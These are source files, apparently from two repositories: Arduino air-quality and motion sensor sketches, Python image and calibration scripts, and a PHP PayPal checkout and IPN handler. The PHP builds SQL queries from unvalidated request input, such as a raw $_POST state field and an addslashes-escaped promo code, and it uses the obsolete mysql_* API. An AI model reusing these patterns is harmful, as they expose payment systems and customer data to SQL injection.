    MPU9250_Accelaration_Z.Pack(Get_Current_Time_HEX(nowAcc),Float_32_to_Hex(&MPU9250AccelerationZ),Get_Current_Time_SD(nowAcc),String(MPU9250AccelerationZ));
    MPU9250_Gyro_Rate_X.Pack(Get_Current_Time_HEX(nowGyro),Float_32_to_Hex(&MPU9250GyroRateX),Get_Current_Time_SD(nowGyro),String(MPU9250GyroRateX));
    MPU9250_Gyro_Rate_Y.Pack(Get_Current_Time_HEX(nowGyro),Float_32_to_Hex(&MPU9250GyroRateY),Get_Current_Time_SD(nowGyro),String(MPU9250GyroRateY));
    MPU9250_Gyro_Rate_Z.Pack(Get_Current_Time_HEX(nowGyro),Float_32_to_Hex(&MPU9250GyroRateZ),Get_Current_Time_SD(nowGyro),String(MPU9250GyroRateZ));
    MPU9250_Magnetic_Feild_X.Pack(Get_Current_Time_HEX(nowMag),Float_32_to_Hex(&MPU9250MagFeildX),Get_Current_Time_SD(nowMag),String(MPU9250MagFeildX));
    MPU9250_Magnetic_Feild_Y.Pack(Get_Current_Time_HEX(nowMag),Float_32_to_Hex(&MPU9250MagFeildY),Get_Current_Time_SD(nowMag),String(MPU9250MagFeildY));
    MPU9250_Magnetic_Feild_Z.Pack(Get_Current_Time_HEX(nowMag),Float_32_to_Hex(&MPU9250MagFeildZ),Get_Current_Time_SD(nowMag),String(MPU9250MagFeildZ));
    // fix: the temperature record previously packed the X magnetic field
    // (copy-paste error) and MPU9250Temprature was never used.
    MPU9250_Temperature.Pack(Get_Current_Time_HEX(nowMag),Float_32_to_Hex(&MPU9250Temprature),Get_Current_Time_SD(nowMag),String(MPU9250Temprature));

    // Tait-Bryan angles from the updated quaternion (z-down convention;
    // apply yaw, then pitch, then roll). See
    // http://en.wikipedia.org/wiki/Conversion_between_quaternions_and_Euler_angles
    myIMU.yaw = atan2(2.0f * (*(getQ()+1) * *(getQ()+2) + *getQ() *
                  *(getQ()+3)), *getQ() * *getQ() + *(getQ()+1) * *(getQ()+1)
                  - *(getQ()+2) * *(getQ()+2) - *(getQ()+3) * *(getQ()+3));
    myIMU.pitch = -asin(2.0f * (*(getQ()+1) * *(getQ()+3) - *getQ() *
                  *(getQ()+2)));
    myIMU.roll = atan2(2.0f * (*getQ() * *(getQ()+1) + *(getQ()+2) *
                  *(getQ()+3)), *getQ() * *getQ() - *(getQ()+1) * *(getQ()+1)
                  - *(getQ()+2) * *(getQ()+2) + *(getQ()+3) * *(getQ()+3));
    myIMU.pitch *= RAD_TO_DEG;
    myIMU.yaw *= RAD_TO_DEG;
    // Magnetic declination at SparkFun HQ, 8.5 deg E (2016-07-19) --
    // http://www.ngdc.noaa.gov/geomag-web/#declination -- TODO: localize.
    myIMU.yaw -= 8.5;
    myIMU.roll *= RAD_TO_DEG;

    String Euler_Yaw = String(myIMU.yaw, 2);
    String Euler_Pitch = String(myIMU.pitch, 2);
    String Euler_Roll = String(myIMU.roll, 2);
    String Euler_Frequency = String((float)myIMU.sumCount/myIMU.sum, 2);

    // Reset the integration counters for the next cycle.
    myIMU.count = millis();
    myIMU.sumCount = 0;
    myIMU.sum = 0;

    // Stable when the squared gyro-rate magnitude is below 10 (deg/s)^2.
    Device_Stable = ((pow(MPU9250GyroRateX,2)+pow(MPU9250GyroRateY,2)+pow(MPU9250GyroRateZ,2)<10));
  }else
  {
    // Sensor not ready: mark it offline and treat the device as unstable.
    MPU9250_Online = false;
    Device_Stable = false;
  }
}// Read MPU 9250
```
Further modifications to a unified Bike Waggle implementation were made during the week.
## September 3-7
#### Task 28 - Completion of the Bike Waggle Code - Phase 1
The modules worked on during the previous weeks were combined into one unified code base. The following [link](https://github.com/waggle-sensor/summer2018/tree/master/bike_waggle/firmware) gives the said implementation.
#### Task 30 -Completion of the Wiring Diagram
In order to complete the PCB for the Bike Waggle(Micro Waggle for bikes) the following Diagram was done.
<img src="https://github.com/waggle-sensor/summer2018/blob/master/bike_waggle/Bike-Waggle-Wiring-Layout.svg">
Further modifications to the said diagram can be done through this [link](https://www.digikey.com/schemeit/project/bike-waggle-3-OEFH9F8401JG/).
## September 10-14
#### Task 31 - The Completion of the PCB
The PCB was done using [Eagle](https://www.autodesk.com/products/eagle/overview). The final design files can be found [here](https://github.com/waggle-sensor/summer2018/tree/master/bike_waggle/PCB_Design).
##### The final Bike Waggle PCB
<img src="https://github.com/waggle-sensor/summer2018/blob/master/bike_waggle/PCB_Design/Bike_Waggle_PCB_Image.png">
## September 17th -21st
#### Task 32 - Addition of the control elements for the bike waggle.
The bike waggle is a spin off of Waggle Micro waggle architecture. The micro waggle supports several control elements of the nodes. An example code can be found [here](https://github.com/waggle-sensor/summer2018/tree/master/bike_waggle/controller).
To make way for such control options, the Bike Waggle code was modified.
The BW supports the following controller options:
- Enabling and Disabling Sensors.
- Control of timing options in sensing and publishing data
The modified bike waggle code can be found [here](https://github.com/waggle-sensor/summer2018/blob/master/wijeratne/codes/Bike_Waggle_Current/firmware_4/firmware.ino).
<file_sep>#include <Arduino.h>
// #include "Adafruit_Sensor.h"
#include "Seeed_BME280.h"
// #include "MutichannelGasSensor.h"
//
#include "OPCN2NanoMints.h"
#include "jobsMints.h"
#include "devicesMints.h"
#define CS 10  // OPC-N2 SPI chip-select pin
OPCN2NanoMints opc = OPCN2NanoMints(CS);
// Online flags, set by each sensor's initializer in setup().
bool OPCN2Online;
//
bool MGS001Online;
bool BME280Online;
BME280 bme280; // I2C
uint16_t sensingPeriod = 3213;  // ms between sensor polls in loop()
uint16_t initPeriod = 1500;     // ms settle time between init steps
// Boot sequence: open serial, then bring up each sensor in turn, recording
// which ones are online. initPeriod settles each device between init calls.
void setup() {
delay(initPeriod);
initializeSerialMints();
//
delay(initPeriod);
BME280Online = initializeBME280Mints();
//
delay(initPeriod);
MGS001Online = initializeMGS001Mints();
delay(initPeriod);
OPCN2Online = initializeOPCN2Mints();
// delay(initPeriod);
// SCD30Online = initializeSCD30Mints();
//
// delay(1000);
// INA219Online = initializeINA219Mints();
}
// the loop routine runs over and over again forever:
// Main cycle: wait sensingPeriod before each sensor, then poll only the
// sensors that initialized successfully in setup().
void loop() {
//
delay(sensingPeriod);
if(BME280Online)
{
readBME280Mints();
}
// //
delay(sensingPeriod);
if(MGS001Online)
{
readMGS001Mints();
}
// //
delay(sensingPeriod);
if(OPCN2Online)
{
readOPCN2Mints();
}
}
<file_sep># Exercises
## Ex1: Create an Arduino Account and log into the Arduino Web IDE:
The IDE can be found [here](https://www.arduino.cc/en/Main/Software)
## Ex2:
- Run the following script for an Arduino Nano on the Arduino Web IDE:
```
/*
# ***************************************************************************
# Summer 2019: Ex2
# ---------------------------------
# Written by: [ADD YOUR NAME]
# - for -
# Mints: Multi-scale Integrated Sensing and Simulation
# ---------------------------------
# Date: June 25th, 2019
# ---------------------------------
# [SAY SOMETHING ABOUT THE SKETCH]
# --------------------------------------------------------------------------
# https://github.com/mi3nts
# http://utdmints.info/
# ***************************************************************************
*/
// the setup routine runs once when you press reset:
// Open the USB serial link so println output reaches the Serial Monitor.
void setup() {
// initialize serial communication at 9600 bits per second:
Serial.begin(9600);
}
// the loop routine runs over and over again forever:
// Print a greeting once a second, forever.
void loop() {
// print out a String of your choice
Serial.println("Hello MINTS: Multi-scale Integrated Sensing and Simulation");
// Delay for 1000 milliseconds
delay(1000); // delay in between reads for stability
}
```
- Check what's printed out on the serial monitor:
## Ex3: Run the following script for an Arduino Nano on the Arduino Web IDE:
```
/*
# ***************************************************************************
# Summer 2019: Ex3
# ---------------------------------
# Written by: [ADD YOUR NAME]
# - for -
# Mints: Multi-scale Integrated Sensing and Simulation
# ---------------------------------
# Date: June 25th, 2019
# ---------------------------------
# [SAY SOMETHING ABOUT THE SKETCH]
# --------------------------------------------------------------------------
# https://github.com/mi3nts
# http://utdmints.info/
# ***************************************************************************
*/
// Configure the on-board LED pin for output.
void setup() {
// initialize digital pin LED_BUILTIN as an output.
pinMode(LED_BUILTIN, OUTPUT);
}
// the loop function runs over and over again forever
// Blink the built-in LED with a one-second on / one-second off cycle.
void loop() {
digitalWrite(LED_BUILTIN, HIGH); // turn the LED on (HIGH is the voltage level)
delay(1000); // wait for a second
digitalWrite(LED_BUILTIN, LOW); // turn the LED off by making the voltage LOW
delay(1000); // wait for a second
}
```
- Change the Delay Times and see how the Arduino responds:
## Ex4: Download and install Arduino Desktop IDE:
The IDE can be found [here](https://www.arduino.cc/en/Main/Software)
## Ex5: Do Exercise 2 and 3 on the Desktop IDE
## EX6: Download And Install Atom Desktop IDE
- The Atom Desktop IDE can be found [here](https://atom.io/)
## Ex7: Install PlatformIO within Atom
- This [link](https://platformio.org/install/ide?install=atom) gives you installation details
## EX8: Install the following Libraries on PlatformIO and run the relevant scripts given:
- Seeed_BME280.h
```
#include "Seeed_BME280.h"
#include <Wire.h>
BME280 bme280;
// Open serial and initialize the BME280; logs an error if the sensor
// does not respond (execution continues regardless).
void setup()
{
Serial.begin(9600);
if(!bme280.init()){
Serial.println("Device error!");
}
}
// Print temperature, pressure, derived altitude, and humidity once a second.
void loop()
{
float pressure;
//get and print temperatures
Serial.print("Temp: ");
Serial.print(bme280.getTemperature());
Serial.println("C");//The unit is Celsius; the original Arduino doesn't support special symbols
//get and print atmospheric pressure data
Serial.print("Pressure: ");
Serial.print(pressure = bme280.getPressure());
Serial.println("Pa");
//get and print altitude data (derived from the pressure just read)
Serial.print("Altitude: ");
Serial.print(bme280.calcAltitude(pressure));
Serial.println("m");
//get and print humidity data
Serial.print("Humidity: ");
Serial.print(bme280.getHumidity());
Serial.println("%");
delay(1000);
}
```
<file_sep># Image Procssing Tutorial
## Display the PNG named '0001.png' using Python

    img = cv2.imread('0001.png')
    cv2.imshow('0001.png', img)
    cv2.waitKey(0)
<file_sep>/*
Adapted From example code
Displays RGBC data
*/
#include <Wire.h>
#include "Seeed_TMG3993.h"
TMG3993 sensor;
// Initialize the TMG3993 over I2C; halts forever on failure so wiring
// problems are obvious. Sets the ALS integration time and enables the
// power-on, ALS, and ALS-interrupt engines.
void setup()
{
Serial.begin(9600);
Serial.println("TMG3993 Proximity and RGBC");
Wire.begin();
if (sensor.initialize() == false)
{
Serial.println("Check wiring");
while (1);  // hard stop: nothing works without the sensor
}
// 0xdb: ADC integration time register value from the vendor example.
sensor.setADCIntegrationTime(0xdb);
sensor.enableEngines(ENABLE_PON | ENABLE_AEN | ENABLE_AIEN);
}
// Once a second, if a new ALS sample is valid, read raw RGBC, derive
// lux and correlated color temperature, print everything, and clear
// the ALS interrupt.
void loop()
{
if (sensor.getSTATUS() & STATUS_AVALID)
{
int r,g,b,c;
int lux, cct;
sensor.getRGBCRaw(&r, &g, &b, &c); // Pass pointers as arguments since we want to overwrite those values
lux = sensor.getLux(r, g, b, c);
cct = sensor.getCCT(r, g, b, c);
Serial.print("R: ");
Serial.print(r);
Serial.print("\tG: ");
Serial.print(g);
Serial.print("\tB: ");
Serial.print(b);
Serial.print("\tC: ");
Serial.println(c);
Serial.print("Lux: ");
Serial.print(lux);
Serial.print("\tCCT: ");
Serial.println(cct);
Serial.println("----");
sensor.clearALSInterrupts();
}
delay(1000);
}
<file_sep># /* mi3nts
# Written by: <NAME>
# - for -
# Lakitha's exercise
# Date: July 29th, 2019
# Atom
# Github
# Python */
import numpy as np
import cv2

# Load the image (OpenCV reads in BGR channel order).
img = cv2.imread('seal.jpg')
print(img.shape)

# Extract full single-channel images. The original code took
# img[100, 100, c] -- a single scalar pixel value -- which cv2.imshow
# cannot display; slice the whole channel instead.
blue = img[:, :, 0]
green = img[:, :, 1]
red = img[:, :, 2]

# Show each channel as a grayscale window until a key is pressed.
cv2.imshow('green', green)
cv2.imshow('red', red)
cv2.imshow('blue', blue)
cv2.waitKey(0)
cv2.destroyAllWindows()

# import matplotlib.pyplot as plt
# plt.imshow([[0, 0, 0],
# [1, 1, 1],
# [2, 2, 2],],)
# plt.colorbar()
# plt.show()
<file_sep>#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Aug 9 10:55:50 2019
@author: s243476
"""
import pandas as pd
import matplotlib.pyplot as plt
from sklearn import linear_model
from sklearn.model_selection import train_test_split
from sklearn.metrics import mean_squared_error
# load dataset
# Co-location CSV of loRa sensor readings vs. Grimm reference instrument;
# the first column is a row index and is dropped.
data = pd.read_csv("../downloads/calibrate.csv")
data.shape
data = data.iloc[:, 1:]
def normalize(col):
    """Rescale a numeric column into [-1, 1] based on its min/max range.

    Maps the midpoint of the column's range to 0 and the extremes to -1/+1.
    """
    max_val = col.max()
    # BUG FIX: this was `col.max()`, which made the half-range zero and the
    # division below blow up (inf/NaN for every row).
    min_val = col.min()
    center = (max_val + min_val) / 2
    half_range = (max_val - min_val) / 2
    return (col - center) / half_range
# clean dataset
# remove null values if any
data[data.isnull()] = 0
col = data.head()
for i in list(col):
    # NOTE(review): this re-normalizes the same C4H10 column once per column
    # name -- presumably `data[i] = normalize(data[i])` was intended; confirm.
    data["C4H10_loRa"] = normalize(data["C4H10_loRa"])
plt.figure(0)
plt.hist(data["C4H10_loRa"])
#data["C4H10_loRa"] = data["C4H10_loRa"]/1000
#data["NO2_loRa"] = (data["NO2_loRa"]-4.5)*2
#data["CH4_loRa"] = (data["CH4_loRa"]-500)/200
#data["H2_loRa"] = (data["H2_loRa"]-900)/30
#data["P1_lpo_loRa"] = (data["P1_lpo_loRa"])/100000
#data["P1_conc_loRa"] = (data["P1_conc_loRa"])/500
#data["P2_lpo_loRa"] = (data["P2_lpo_loRa"])/100000
#data["P2_conc_loRa"] = (data["P2_conc_loRa"]-500)/500
#data["Temperature_loRa"] = (data["Temperature_loRa"]-22)/10
#data["Pressure_loRa"] = (data["Pressure_loRa"]-98868)/50
#data["Humidity_loRa"] = (data["Humidity_loRa"]-40)/40
#data["Humidity_loRa"] = (data["Humidity_loRa"]-40)/40
# split into training and test sets
# predict quality of wine
train, test = train_test_split(data, test_size=.2)
# Inputs: loRa sensor columns; targets: Grimm reference columns.
train_in = train.loc[:, "NH3_loRa":"Humidity_loRa"]
train_out = train.loc[:, "pm10_grimm":"alveolic_grimm"]
# Clip extreme normalized sensor values into [-5, 5].
train_in[train_in > 5] = 5
train_in[train_in < -5] = -5
test_in = test.loc[:, "NH3_loRa":"Humidity_loRa"]
test_out = test.loc[:, "pm10_grimm":"alveolic_grimm"]
test_in[test_in > 5] = 5
test_in[test_in < -5] = -5
# Baseline model: ordinary least-squares linear regression.
reg=linear_model.LinearRegression().fit(train_in, train_out)
lr_pred = reg.predict(test_in)
lr_train_pred = reg.predict(train_in)
# Plot predicted vs. reference pm10 (red = train, blue = test).
plt.figure(1)
plt.xlabel("pm10_grimm")
plt.ylabel("prediction")
print(lr_pred.shape)
x = test_out["pm10_grimm"]
y = lr_pred[:, 0]
plt.plot(train_out["pm10_grimm"], lr_train_pred[:, 0], 'ro')
plt.plot(x, y, 'bo')
print("Linear reg error ", mean_squared_error(lr_pred, test_out))
# create model = > neural network
# use test set to predict values
from sklearn.neural_network import MLPRegressor
nn = MLPRegressor(hidden_layer_sizes=(4, 4), activation='relu', solver='lbfgs', alpha=0.001,
                  batch_size=30, max_iter=5000, tol=0.005, verbose=False)
nn.fit(train_in, train_out)
nn_pred = nn.predict(test_in)
nn_train_pred = nn.predict(train_in)
plt.figure(2)
plt.xlabel("pm10_grimm")
plt.ylabel("prediction")
x = test_out["pm10_grimm"]
y = nn_pred[:, 0]
plt.plot(train_out["pm10_grimm"], nn_train_pred[:, 0], 'ro')
plt.plot(x, y, 'bo')
print("Neural Network error ", mean_squared_error(nn_pred, test_out))
# Random Forest
from sklearn.ensemble import RandomForestRegressor
regr = RandomForestRegressor(max_depth=10, random_state=0, n_estimators=100)
regr.fit(train_in, train_out)
print(regr.feature_importances_)
rf_pred = regr.predict(test_in)
rf_train_pred = regr.predict(train_in)
plt.figure(3)
plt.xlabel("pm10_grimm")
plt.ylabel("prediction")
x = test_out["pm10_grimm"]
y = rf_pred[:, 0]
plt.plot(train_out["pm10_grimm"], rf_train_pred[:, 0], 'ro')
plt.plot(x, y, 'bo')
print("Random Forest error ", mean_squared_error(rf_pred, test_out))
<file_sep>#include "jobsMints.h"
// Open the primary serial port at 9600 baud and announce readiness.
void initializeSerialMints(){
Serial.begin(9600);
Serial.println("Serial Port Open");
}
//
// void initializeSerialUSBMints(){
// SerialUSB.begin(9600);
// Serial.println("SerialUSB Port Open");
// }
// Emit one sensor record over Serial in the MINTS framing:
// "#mintsO!<sensor>>" followed by each value terminated by ':',
// with '~' marking the end of the record.
void sensorPrintMints(String sensor, String readings[], uint8_t numOfvals){
  Serial.print("#mintsO!");
  Serial.print(sensor);
  Serial.print(">");
  for (uint8_t idx = 0; idx < numOfvals; ++idx)
  {
    Serial.print(readings[idx]);
    Serial.print(":");
  }
  Serial.print("~");
}
// Native Command
// void serialEvent() {
// while (Serial.available()) {
// // get the new byte:
// char inChar = (char)Serial.read();
// // add it to the inputString:
//
// inputString += inChar;
// // if the incoming character is a newline, set a flag so the main loop can
// // do something about it:
// if (inChar == '-') {
// stringComplete = true;
// }
// }
// }
//
//
//
// void commandReadMints(){
// // Serial.println("inside");
// if (stringComplete) {
// Serial.println(inputString);
// sendCommand2DevicesMints(inputString);
//
// // clear the string:
// inputString = "";
// stringComplete = false;
// }
// }
//
// void sendCommand2DevicesMints(String command){
//
// if (command.startsWith("mints:")) {
// printInput("Recieving Mints Command");
//
// if (command.startsWith("HTU21D",6)) {
// readHTU21DMints();
// }
//
// if (command.startsWith("BMP280",6)) {
// readBMP280Mints();
// // SerialUSB.println(year());
// }
//
// if (command.startsWith("time",6)) {
// setTimeMints(command.substring(11));
//
// }
//
// }
// }
//
// String int2StringMints(int inputNumber){
//
// return String::format("%04d:%02d:%02d:%02d:%02d:%02d",inputNumber);
//
// }
<file_sep>#ifndef DEVICES_MINTS_H
#define DEVICES_MINTS_H
//
#include <Arduino.h>
// #include "Adafruit_Sensor.h"
#include "Seeed_BME280.h"
#include "MutichannelGasSensor.h"
#include "OPCN2NanoMints.h"
#include "jobsMints.h"
// #include <Adafruit_INA219.h>
// #include "SparkFun_SCD30_Arduino_Library.h"
// void sendCommand2DevicesMints(String command);
//
// void setTimeMints(String command);
// void printTimeMints();
// void printTimeOnlyMints();
//
// extern bool serialOut;
//
extern BME280 bme280;
bool initializeBME280Mints();
void readBME280Mints();
//
bool initializeMGS001Mints();
void readMGS001Mints();
//
// extern SCD30 scd;
// bool initializeSCD30Mints();
// void readSCD30Mints();
//
extern OPCN2NanoMints opc;
bool initializeOPCN2Mints();
void readOPCN2Mints();
// extern Adafruit_INA219 ina;
// bool initializeINA219Mints();
// void readINA219Mints();
// void printInput(String command);
// void sensorPrintMints(String sensor,String readigs[],uint8_t numOfvals);
#endif
<file_sep>/*
Written by <NAME>.
Displays Temperature in Celsius, Pressure in Pascals, Altitude in Meters, and Humidity.
Measurement Interval is 1 second.
*/
#include <Wire.h>
#include "Seeed_BME280.h"
BME280 sensor;
void setup() {
Wire.begin();
Serial.begin(9600);
Serial.println("BME280 Temperature, Pressure, Altitude, and Humidity");
if (!sensor.init()) {
Serial.print("Error with sensor");
}
}
void loop() {
Serial.print("Temperature: ");
Serial.print(sensor.getTemperature());
Serial.print(" C\nPressure: ");
Serial.print(sensor.getPressure());
Serial.print(" Pa");
Serial.print("\nAltitude: ");
Serial.print(sensor.calcAltitude(sensor.getPressure()));
Serial.print("m \nHumidity: ");
Serial.print(sensor.getHumidity());
Serial.print("% \n --- \n");
delay(1000);
}
| 76fc131bef2170f0ddd3cee5cda41b3412688422 | [
"Markdown",
"C",
"Python",
"C++"
] | 23 | Python | mi3nts/summer2019 | 60c500c91f82feb907d4aa733f6062ac456bbc92 | 7042956969b113f526baacdf126bd7a9981d14c8 |
refs/heads/master | <repo_name>elvis460/table_system<file_sep>/app.js
// MEAN Stack RESTful API Tutorial - Contact List App
var express = require('express');
var app = express();
var http = require('http').Server(app);
var io = require('socket.io')(http);
var helmet = require('helmet');
var session = require('express-session');
var bodyParser=require('body-parser');
var fs = require('fs');
var secret=require('./secret.js')
var jwt = require('jsonwebtoken');
var socketioJwt = require('socketio-jwt');
var condA,condB,condC;
var numOnline=0;
var expireInMinute=24*60;
var loginData={
aaa:"AAA",
bbb:"BBB",
ccc:"CCC"
}
// var mongojs = require('mongojs');
// var db = mongojs('contactlist', ['contactlist']);
//var bodyParser = require('body-parser');
//app.set('env', 'production');
app.use(helmet());
app.use(bodyParser.json());
app.use(bodyParser.urlencoded({ extended: true }));
app.use(session({
secret: secret.sessionSecret,
cookie: {
maxAge: expireInMinute*60*1000,
httpOnly: true
//domain: 'table.mgr.ddns.net'
},
resave: true,
saveUninitialized: true
}));
app.post('/api/login', function (req, res,next) {
//console.log("receive request");
if(req.session.token){ //has logined, send token back
res.json({success:"true",token: req.session.token});
}
else if(req.body.account==undefined||req.body.passwd==undefined){
res.type("json");
res.json({success:"false"});
}
else if(loginData[req.body.account]===req.body.passwd){ //login successfully
var profile = {
account: req.body.account
};
var token = jwt.sign(profile, secret.sessionSecret, { expiresInMinutes: expireInMinute });
req.session.token=token;
res.type("json");
res.json({success:"true",token:token});
}
else{
res.type("json");
res.json({success:"false"});
}
});
app.use(express.static(__dirname + '/public'));
app.use(function(req, res, next) {
var err = new Error('Not Found');
err.status = 404;
next(err);
});
if (app.get('env') === 'development') {
app.use(function(err, req, res, next) {
res.status(err.status || 500);
res.render('error', {
message: err.message,
error: err
});
});
}
//
// // production error handler
// // no stacktraces leaked to user
else{
app.use(function(err, req, res, next) {
res.status(err.status || 500);
res.send('<H1 style=margin-left:50%>404 Not Found</H1>');
});
}
//app.use(bodyParser.json());
io.set('authorization', socketioJwt.authorize({
secret: secret.sessionSecret,
handshake: true
}));
io.on('connection', function(socket){
console.log(socket.handshake);
//console.log(socket.handshake.decoded_token.account, 'connected');
console.log("sign in");
socket.on('disconnect',function(socket){
io.emit('updateOnline',io.engine.clientsCount);
});
socket.on("recv_updateA", function(msg){
io.emit('updateA',msg);
condA=msg;
});
socket.on("recv_updateB", function(msg){
io.emit('updateB', { status: msg });
condB=msg;
});
socket.on("recv_updateC", function(msg){
io.emit('updateC', { status: msg });
condC=msg;
});
socket.on('new_connt',function(msg){
numOnline++;
socket.emit('updateA',condA);
socket.emit('updateB',condB);
socket.emit('updateC',condC);
io.emit('updateOnline',io.engine.clientsCount);
});
socket.on('reset',function(msg){
condA={};
condB={};
condC={};
});
});
http.listen(3000, function(){
console.log('listening on *:3000');
});
| e4966e793c70454ebec6e54e1d1ba641cac03ef9 | [
"JavaScript"
] | 1 | JavaScript | elvis460/table_system | e97de839a5fd9b32e897849c47cfc9330e3295e1 | 1ca8b0fffa374b86347466e37f6359f65ca83096 |
refs/heads/master | <repo_name>icerock/paypal_form_and_ipn<file_sep>/README.md
# paypal_form_and_ipn
just a paypal buynow form with button and working IPN page
saving it here not to loose, cause pp api docs are 90% useless
<file_sep>/checkout-pp.php
<div class="container">
<nav aria-label="breadcrumb">
<ol class="breadcrumb">
<li class="breadcrumb-item"><a href="/">Home</a></li>
<li class="breadcrumb-item active" aria-current="page">Payment</li>
</ol>
</nav>
</div>
<?php
if(!empty($_SESSION['cart'])){
$promo = addslashes(htmlspecialchars($_POST['promo']));
$promo = mb_strtoupper($promo, 'UTF-8');
if(!empty($promo)){
$query = "SELECT * FROM `promo` WHERE `code` = '$promo'";
$result = mysql_query($query);
$num = mysql_numrows($result);
if($num == 1){
$discount = mysql_result($result,0,'discount');
$free_delivery = mysql_result($result,0,'free_delivery');
}
}
$client_id = $_SESSION['client_id'];
$date = date('Y-m-d');
$time = date('H:i:s');
$query = "INSERT INTO `retail_orders` VALUES ('','','$date','$time','$client_id','','','','','','','','','','','','','','',1,'','','','','','','','','','$promo','$discount','$free_delivery','','','')";
mysql_query($query) or die ($query);
$order_id = mysql_insert_id();
//getting order number
$order_number = $order_id+1130;
$order_number = $index->numberFormat($order_number,5);
//saving order number
$query = "UPDATE `retail_orders` SET `order_number` = '$order_number' WHERE `id` = '$order_id'";
mysql_query($query) or die ($query);
$cart = $_SESSION['cart'];
$total = 0;
foreach($cart as $cart_id => $values){
foreach($values as $size => $cart_q)
{
$query = "SELECT * FROM `items` WHERE id = '$cart_id'";
$result = mysql_query($query);
$name = mysql_result($result, 0, 'name');
$price = mysql_result($result, 0, 'price');
$new_price = mysql_result($result, 0, 'new_price');
if ($new_price > 0) {
$sub_subtotal = $new_price * $cart_q;
$price = $new_price;
} else {
$sub_subtotal = $price * $cart_q;
}
$subtotal = $subtotal + $sub_subtotal;
//pushing each item into order
$query = "INSERT INTO `retail_order_items` VALUES ('','$order_id','$cart_id','$size','$price','$cart_q')";
$result = mysql_query($query);
}
}
if($free_delivery == 0){
$free_delivery_sum = $index->returnValue(23);
if ($subtotal >= $free_delivery_sum) {
$delivery = 0;
} else {
$delivery = $index->returnValue(24);
}
}
else {
$delivery = 0;
}
$total = $subtotal + $delivery;
if($discount > 0){
$total = $total - ($total * $discount)/100;
$total = number_format($total, 2);
}
$query = "UPDATE `retail_orders` SET `subtotal` = '$subtotal',`delivery` = '$delivery',`total` = '$total' WHERE `id` = '$order_id'";
mysql_query($query) or die($query);
// PAYPAL
$paypalEmail = "<EMAIL>";
$paypalURL = "https://www.paypal.com/cgi-bin/webscr";
$itemName = "Order #".$order_number;
$returnUrl = "https://siberiaspirit.com/payment-success?key=spirit";
$cancelUrl = "https://siberiaspirit.com/cart?key=spirit";
$notifyUrl = "https://siberiaspirit.com/ipn/cl.php";
?>
<div class="container">
<h1 class="public-inner-title product-title">Payment</h1>
<p class="thankyou">Thank you for your order! Now you will be redirected to the payment page. If you don't want to wait press the button.</p>
<form action="<?php echo $paypalURL; ?>" method="post" target="_top" class="df-form" id="topaypal">
<!-- Identify your business so that you can collect the payments. -->
<input type="hidden" name="business" value="<?=$paypalEmail?>">
<!-- Specify a Buy Now button. -->
<input type="hidden" name="cmd" value="_xclick">
<!-- Specify details about the item that buyers will purchase. -->
<input type="hidden" name="item_name" value="<?=$itemName?>">
<input type="hidden" name="amount" value="<?=$total?>">
<input type="hidden" name="currency_code" value="USD">
<input type="hidden" name="notify_url" value="<?=$notifyUrl?>">
<input type="hidden" name="custom" value="<?=$order_id?>">
<input type="hidden" name="no_shipping" value="2">
<!-- Display the payment button. -->
<!-- <input type="image" name="submit" border="0"
src="https://www.paypalobjects.com/en_US/i/btn/btn_buynow_LG.gif"
alt="Buy Now"> -->
<div class="row">
<div class="col-sm-5">
<button type="submit" class="df-btn accent-btn submit">Continue to payment</button>
</div>
</div>
<img alt="" border="0" width="1" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif">
</form>
</div>
<?php
//clearing cart
unset ($_SESSION['cart']);
unset ($_SESSION['s_quantity']);
unset ($_SESSION['s_pairs']);
}
else {
?>
<div class="container">
<h1 class="public-inner-title product-title">Order payment</h1>
<div class="cart-block">
<p class="empty">Your cart is empty :(</p>
</div>
</div>
<?php
}
?>
<file_sep>/cl.php
<?php
// STEP 1: read POST data
// Reading POSTed data directly from $_POST causes serialization issues with array data in the POST.
// Instead, read raw POST data from the input stream.
$raw_post_data = file_get_contents('php://input');
$raw_post_array = explode('&', $raw_post_data);
$myPost = array();
foreach ($raw_post_array as $keyval) {
$keyval = explode ('=', $keyval);
if (count($keyval) == 2)
$myPost[$keyval[0]] = urldecode($keyval[1]);
}
// read the IPN message sent from PayPal and prepend 'cmd=_notify-validate'
$req = 'cmd=_notify-validate';
if(function_exists('get_magic_quotes_gpc')) {
$get_magic_quotes_exists = true;
}
foreach ($myPost as $key => $value) {
if($get_magic_quotes_exists == true && get_magic_quotes_gpc() == 1) {
$value = urlencode(stripslashes($value));
} else {
$value = urlencode($value);
}
$req .= "&$key=$value";
}
// STEP 2: POST IPN data back to PayPal to validate
$ch = curl_init('https://www.paypal.com/cgi-bin/webscr');
curl_setopt($ch, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $req);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
curl_setopt($ch, CURLOPT_FORBID_REUSE, 1);
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Connection: Close'));
// In wamp-like environments that do not come bundled with root authority certificates,
// please download 'cacert.pem' from "http://curl.haxx.se/docs/caextract.html" and set
// the directory path of the certificate as shown below:
// curl_setopt($ch, CURLOPT_CAINFO, dirname(__FILE__) . '/cacert.pem');
if( !($res = curl_exec($ch)) ) {
// error_log("Got " . curl_error($ch) . " when processing IPN data");
curl_close($ch);
exit;
}
curl_close($ch);
// STEP 3: Inspect IPN validation result and act accordingly
if (strcmp ($res, "VERIFIED") == 0) {
// The IPN is verified, process it:
// check whether the payment_status is Completed
// check that txn_id has not been previously processed
// check that receiver_email is your Primary PayPal email
// check that payment_amount/payment_currency are correct
// process the notification
// assign posted variables to local variables
$txn_id = $_POST['txn_id'];
$order_number = $_POST['item_name'];
$payment_amount = $_POST['mc_gross'];
$payment_currency = $_POST['mc_currency'];
$payment_status = $_POST['payment_status'];
$receiver_email = $_POST['receiver_email'];
$payer_email = $_POST['payer_email'];
$order_id = $_POST['custom'];
$full_name = $_POST['address_name'];
$names = explode (" ",$full_name);
$first_name = $names[0];
$last_name = $names[1];
$address = $_POST['address_street'];
$city = $_POST['address_city'];
$state = $_POST['address_state'];
$query = "SELECT `id` FROM `states` WHERE `abbr` = '$state'";
$result = mysql_query($query);
$state = mysql_result($result, 0, 'id');
$zip = $_POST['address_zip'];
$date = date('Y-m-d H:i:s');
